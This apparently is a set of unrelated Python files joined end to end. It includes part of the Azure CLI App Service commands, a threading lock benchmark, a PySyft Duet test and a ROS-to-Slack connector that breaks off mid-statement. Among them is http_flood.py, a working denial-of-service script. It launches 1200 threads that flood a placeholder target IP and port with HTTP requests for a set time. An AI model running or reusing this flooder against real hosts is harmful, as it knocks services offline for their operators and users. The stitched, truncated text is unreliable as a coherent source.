"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
    # ensures the key type input is valid
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
    # reformats the vnet entry, removing unnecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
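# Regional VNet integration: resolves the VNet id, verifies the app's plan supports Swift
# connections, delegates the subnet to Microsoft.Web/serverFarms if needed, and attaches the
# subnet to the app (or slot) as a SwiftVirtualNetwork connection.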
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnet_id = ''
for v in list_all_vnets:
if v.name == vnet:
vnet_id = v.id
# parsing the arm uri in order to extract vnet_name and vnet_resource_group
vnet_id_strings = vnet_id.split('/')
vnet_resource_group = ''
i = 0
for z in vnet_id_strings:
if z.lower() == "resourcegroups":
vnet_resource_group = vnet_id_strings[i + 1]
i = i + 1
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
subnet_parameters=subnetObj)
id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
subnet_resource_id = id_subnet.id
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
    # reformats the vnet entry, removing unnecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
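# 'az webapp up' flow: detect the OS and runtime from the sources in the current directory, reuse
# or create the resource group, plan and app, zip-deploy the contents, and persist the chosen
# defaults (group, sku, appserviceplan, location, web) in the CLI config.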
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, dryrun=False, logs=False, # pylint: disable=too-many-statements,
launch_browser=False, html=False):
import os
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_create_new_app = does_app_already_exist(cmd, name)
os_name = detect_os_form_src(src_dir, html)
lang_details = get_lang_from_content(src_dir, html)
language = lang_details.get('language')
# detect the version
data = get_runtime_version_details(lang_details.get('file_loc'), language)
version_used_create = data.get('to_create')
detected_version = data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp %s already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app {}. Please check that the app is a part of "
"the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp {} exists in ResourceGroup {} and does not match the value entered {}. Please "
"re-run command with the correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered {} does not match the plan name that the webapp is hosted in {}."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(rg_name, plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp {} is a {} app. The code detected at '{}' will default to "
"'{}'. "
"Please create a new app to continue this operation.".format(name, current_os, src_dir, os))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("webapp %s doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_is_linux = os_name.lower() == 'linux'
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd, user, os_name, loc, sku, rg_name, _create_new_rg, plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, location)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
    # always call the ASP create-or-update API so that, on re-deployment, any SKU or plan
    # setting changes are applied
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=location)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if _is_linux else None, tags={"cli": 'webapp_up'},
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
    else:  # for an existing app we might need to update the stack runtime settings
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.windows_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
# Remove the file after deployment, handling exception if user removed the file manually
try:
os.remove(zip_file_path)
except OSError:
pass
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _ping_scm_site(cmd, resource_group, name):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify())
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password)
_ping_scm_site(cmd, resource_group_name, name)
_wait_for_webapp(tunnel_server)
return tunnel_server
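# Opens a local TCP tunnel to the app's SCM (Kudu) site, used either for remote debugging or to
# reach the container's SSH endpoint with the credentials hard-coded below ('root' / 'Docker!').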
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
        while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
        while s.is_alive() and t.is_alive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None): # pylint: disable=too-many-statements
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise CLIError('remote debugging is enabled, please disable')
import platform
if platform.system() == "Windows":
raise CLIError('webapp ssh is only supported on linux and mac')
create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
|
http_flood.py
|
import socket, threading, time
__THREAD_NUMBER__ = 1200
def http_flood(ip: str, port: str, timeout: str):
def flood(ip: str, port: int, timeout: int):
start_time = int(time.time())
while int(time.time()) - start_time < timeout:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
for _ in range(50):
sock.send("GET / HTTP/1.1\r\n".encode())
except:
pass
for _ in range(__THREAD_NUMBER__):
threading.Thread(target= flood, args=(ip, int(port), int(timeout),)).start()
http_flood('!ip!', '!port!', '!time!')
|
lockbench.py
|
from threading import Thread
from threading import RLock
from fastrlock.rlock import FastRLock as FLock
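# Micro-benchmarks comparing threading.RLock against fastrlock's FastRLock under several
# acquire/release patterns (plain, reentrant, mixed, non-blocking, context manager), run both
# sequentially and from 10 concurrent threads via timeit.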
def lock_unlock(l):
l.acquire()
l.release()
l.acquire()
l.release()
l.acquire()
l.release()
l.acquire()
l.release()
l.acquire()
l.release()
def reentrant_lock_unlock(l):
l.acquire()
l.acquire()
l.acquire()
l.acquire()
l.acquire()
l.release()
l.release()
l.release()
l.release()
l.release()
def mixed_lock_unlock(l):
l.acquire()
l.release()
l.acquire()
l.acquire()
l.release()
l.acquire()
l.release()
l.acquire()
l.release()
l.release()
def context_manager(l):
with l: pass
with l:
with l:
with l: pass
with l: pass
with l:
with l: pass
with l:
with l: pass
with l: pass
with l: pass
with l:
with l:
with l: pass
with l: pass
with l:
with l: pass
with l: pass
def lock_unlock_nonblocking(l):
if l.acquire(False):
l.release()
if l.acquire(False):
l.release()
if l.acquire(False):
l.release()
if l.acquire(False):
l.release()
if l.acquire(False):
l.release()
def threaded(l, test_func, tcount=10):
threads = [ Thread(target=test_func, args=(l,)) for _ in range(tcount) ]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
functions = [
lock_unlock,
reentrant_lock_unlock,
mixed_lock_unlock,
lock_unlock_nonblocking,
context_manager,
]
import sys
from timeit import Timer
from functools import partial
rlock, flock = ('RLock', RLock()), ('FLock', FLock())
locks = []
args = sys.argv[1:]
if not args:
locks = [rlock, flock]
else:
if 'rlock' in args:
locks.append(rlock)
if 'flock' in args:
locks.append(flock)
assert locks, args
for name, lock in locks:
print('Testing %s' % name)
repeat_count = 100000
print("sequential (x%d):" % repeat_count)
for function in functions:
timer = Timer(partial(function, lock))
print('%-25s: %.3f sec' % (function.__name__, max(timer.repeat(repeat=4, number=repeat_count))))
repeat_count = 1000
print("threaded 10T (x%d):" % repeat_count)
for function in functions:
timer = Timer(partial(threaded, lock, function))
print('%-25s: %.3f sec' % (function.__name__, max(timer.repeat(repeat=4, number=repeat_count))))
|
benchmark_send_get_multiprocess_test.py
|
# stdlib
import socket
import time
from typing import Any
from typing import List
# syft absolute
from syft.lib.python import List as SyList
from syft.lib.python.string import String
# syft relative
from ...syft.grid.duet.process_test import SyftTestProcess
PORT = 21211
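# The data owner (do_send) and data scientist (ds_get) run in separate processes and pair up
# through a local Duet signaling server expected to be listening on PORT; do_send shares the
# object and serves requests, ds_get fetches it back and checks equality.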
def do_send(data: Any) -> None:
# syft absolute
import syft as sy
duet = sy.launch_duet(loopback=True, network_url=f"http://127.0.0.1:{PORT}/")
duet.requests.add_handler(action="accept")
_ = data.send(duet, searchable=True)
sy.core.common.event_loop.loop.run_forever()
def ds_get(data: Any) -> None:
# syft absolute
import syft as sy
duet = sy.join_duet(loopback=True, network_url=f"http://127.0.0.1:{PORT}/")
for retry in range(10):
if len(duet.store) != 0:
break
time.sleep(0.1)
assert len(duet.store) != 0
remote = duet.store[0].get(request_block=True, delete_obj=False)
assert remote == data
def run_endpoints(do_runner: Any, ds_runner: Any, data: Any) -> None:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
assert s.connect_ex(("localhost", PORT)) == 0
do_proc = SyftTestProcess(target=do_runner, args=(data,))
do_proc.start()
ds_proc = SyftTestProcess(target=ds_runner, args=(data,))
ds_proc.start()
ds_proc.join(120)
do_proc.terminate()
if do_proc.exception:
exception, tb = do_proc.exception
raise Exception(tb) from exception
if ds_proc.exception:
exception, tb = ds_proc.exception
raise Exception(tb) from exception
if ds_proc.is_alive():
ds_proc.terminate()
raise Exception(f"ds_proc is hanged for {len(data)}")
def send_get_string_multiprocess(data: String) -> None:
run_endpoints(do_send, ds_get, String(data))
def send_get_list_multiprocess(data: List[str]) -> None:
run_endpoints(do_send, ds_get, SyList(data))
|
ros_connector.py
|
import os
import signal
from base_connector import SlackConnector
import rospy
from std_msgs.msg import String
from rostopic import get_topic_class
from rosservice import get_service_class_by_name
from rosservice import get_service_list
from threading import Thread
from roslib.message import strify_message
import argparse
import roslib
import rosmsg
from collections import defaultdict
from datetime import datetime
from Queue import Queue, Empty
import cv2
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import tempfile
def __signal_handler(signum, frame):
print "stopped."
os._exit(signal.SIGTERM)
class RosConnector(SlackConnector):
ROS_PREFIX = '/slackeros'
LEVEL_SETS = {
'info': set([2, 4, 8, 16]),
'warn': set([4, 8, 16]),
'warning': set([4, 8, 16]),
'error': set([8, 16]),
'fatal': set([16]),
'off': set([])
}
REVERSE_LEVEL_SET = {
0: 'off',
1: 'debug',
2: 'info',
4: 'warn',
8: 'error',
16: 'fatal'
}
LEVEL_COLORS = {
0: '#000000',
1: '#CCCCCC',
2: '#888888',
4: '#FF8C00',
8: '#FF0000',
16: '#FF0000'
}
def __init__(
self,
incoming_webhook=None,
access_token=None,
upload_images=False,
whitelist_channels=[],
image_up_channels=[],
whitelist_users=[],
topics=[ROS_PREFIX + '/to_slack'],
prefix='',
sender_name='slackeros',
loggers={},
throttle_secs=5,
max_lines=50
):
self.incoming_webhook = incoming_webhook
self.access_token = access_token
self.upload_images = upload_images
self.whitelist_channels = set(whitelist_channels)
self.image_up_channels = set(image_up_channels)
self.whitelist_users = set(whitelist_users)
self.topics = set(topics)
self.max_lines = max_lines
self.messages = Queue(0)
self.last_published = defaultdict(rospy.Time)
self.throttle_secs = throttle_secs
self.image_upload_title = 'Image from the robot camera'
self.image_format = "jpeg"
self.bridge = CvBridge()
SlackConnector.__init__(
self, incoming_webhook,
whitelist_channels, whitelist_users, prefix, sender_name)
self.slash_pub = rospy.Publisher('~slash_cmd', String, queue_size=1)
self.subs = {}
for t in self.topics:
self._subscribe(t)
self.default_level = 'off'
self.attachment_buffer = defaultdict(list)
self.message_header = defaultdict(lambda: 'new data')
self.active_loggers = defaultdict(lambda: self.default_level)
if loggers:
self.logger_enabled = True
self.active_loggers.update(loggers)
self._subscribe('/rosout', self._log_received)
else:
self.logger_enabled = False
self.last_attachment = defaultdict(lambda: '')
self.queue_worker = Thread(target=self.process_queue)
self.queue_worker.setDaemon(True)
self.queue_worker.start()
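    # Grabs a single frame from a camera topic in a background thread, converts it with
    # cv_bridge, writes it to a temporary file and hands it to self.send_image() for upload to
    # the configured Slack channels.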
def log_image(
self, type=None,
topic='/head_xtion/rgb/image_color',
channels=[]
):
class ImageUploader(Thread):
def __init__(
self, access_token, bridge, send_image, type=None,
image_format='jpeg', channels=[], image_upload_title="",
topic='/head_xtion/rgb/image_color'
):
Thread.__init__(self)
self.access_token = access_token
self.bridge = bridge
self.send_image = send_image
self.type = type
self.image_format = image_format
self.channels = channels
self.image_upload_title = image_upload_title
self.topic = topic
def run(self):
# upload image
try:
image = rospy.wait_for_message(
self.topic, Image, timeout=1.5)
except rospy.ROSException as e:
rospy.logwarn("No image retrieved before timeout")
return
if self.type is None:
self.type = image.encoding
try:
# Convert your ROS Image message to OpenCV2
if self.type == "rgb8":
self.type = "bgr8"
cv2_img = self.bridge.imgmsg_to_cv2(image, self.type)
except CvBridgeError, e:
rospy.logwarn(e)
return
# Save your OpenCV2 image
                fd, image_path = tempfile.mkstemp(
                    '.' + self.image_format)
                os.close(fd)  # only the path is needed; close the low-level file descriptor
try:
cv2.imwrite(image_path, cv2_img)
except Exception as e:
rospy.logwarn(
"Exception writing image to file %s" % image_path)
return
# upload to slack
params = {
'token': self.access_token,
'channels': list(self.channels),
'filename': image_path,
'filetype': self.image_format,
'title': self.image_upload_title
}
file = {
'file': open(image_path, 'rb')
}
# remove image
try:
os.remove(image_path)
except Exception as e:
rospy.logwarn(
"Exception removing the image %s" % image_path)
self.send_image(params, file)
rospy.loginfo(
"Image %s uploaded to slack with encoding"
" %s to channels %s" % (
image_path, self.type, str(list(self.channels))))
if not bool(channels):
channels = self.image_up_channels
ImageUploader(
self.access_token, self.bridge,
self.send_image, type, self.image_format, channels,
self.image_upload_title, topic).start()
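    # Drains the message queue, buffering attachments per topic and flushing a topic's buffer to
    # Slack at most once every throttle_secs (or whenever the queue stays empty for that long),
    # optionally uploading a camera snapshot as well.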
def process_queue(self):
def __send_out(t):
if self.attachment_buffer[t]:
m = {
'text': self.message_header[t],
'attachments': self.attachment_buffer[t]
}
rospy.logdebug('sending out: %s' % str(m))
self.send(m)
self.attachment_buffer[t] = []
if self.upload_images:
self.log_image(type="rgb8")
while not rospy.is_shutdown():
try:
(topic, attachment) = self.messages.get(
True, timeout=self.throttle_secs)
self.attachment_buffer[topic].append(attachment)
time_elapsed = rospy.Time.now() - self.last_published[topic]
if time_elapsed.to_sec() > self.throttle_secs:
self.last_published[topic] = rospy.Time.now()
__send_out(topic)
self.messages.task_done()
except Empty:
rospy.logdebug('wait time up, time to flush all')
for t in self.attachment_buffer:
__send_out(t)
def _subscribe(self, topic, cb=None):
class DynSub(Thread):
def __init__(self, topic, cb, connected_cb=None):
Thread.__init__(self)
self.topic = topic
self.cb = cb
self.connected_cb = connected_cb
def run(self):
rospy.loginfo(
'trying to connect to topic %s' %
self.topic)
msg_class, real_topic, _ = get_topic_class(
self.topic, blocking=True)
sub = rospy.Subscriber(
real_topic, msg_class, self.cb,
callback_args=(self.topic))
rospy.loginfo(
'connected to topic %s' %
self.topic)
if self.connected_cb:
self.connected_cb(self.topic, sub)
def __connected(topic, sub):
self.subs[topic] = sub
if cb is None:
cb = self._to_slack_cb
DynSub(topic, cb, __connected).start()
def _unsubscribe(self, topic):
if topic in self.subs:
self.subs[topic].unregister()
del self.subs[topic]
def _poll(self, topic, payload, timeout=1.5):
msg_class, real_topic, _ = get_topic_class(
topic, blocking=False)
if msg_class is None:
return '`topic %s not found`' % topic
elif msg_class == Image:
self.log_image(topic=topic, channels=[payload["channel_id"]])
return 'uploading image...'
try:
msg = rospy.wait_for_message(
topic, msg_class, timeout)
return self.__generate_output(msg)
except Exception as e:
return (
'no message received after %.1f seconds: %s' % (
timeout,
str(e)
)
)
def __generate_output(self, msg):
d = strify_message(msg)
# truncate message
lines = d.splitlines()
if len(lines) > self.max_lines:
rospy.loginfo(
                'output truncated, too long (showing %d of %d lines only).' %
(self.max_lines, len(lines)))
d = '\n'.join(lines[0:self.max_lines])
d += (
'\n\n[%s]' %
'*** output truncated, too long '
'(showing %d of %d lines only). ***' %
(self.max_lines, len(lines))
)
return d
def _push(self, topic, attachment):
self.messages.put((topic, attachment,))
def _to_slack_cb(self, msg, topic):
rospy.logdebug('msg received on topic %s' % topic)
d = self.__generate_output(msg)
att = {
'text': "```\n%s\n```" % d,
"mrkdwn_in": ["text", "pretext"],
# 'pretext': (
# 'published by node `%s` on `%s`' %
# (msg._connection_header['callerid'], topic)),
'footer': '%s' % str(datetime.now()),
"fallback": d,
'author_name': '%s' % (
msg._connection_header['callerid']),
# 'author_name': '%s: %s (by %s)' % (
# self.sender_name, topic,
# msg._connection_header['callerid']),
"color": '#0000AA',
'ts': rospy.Time.now().secs
}
self.message_header[topic] = (
'*%s* _`%s`_ ' %
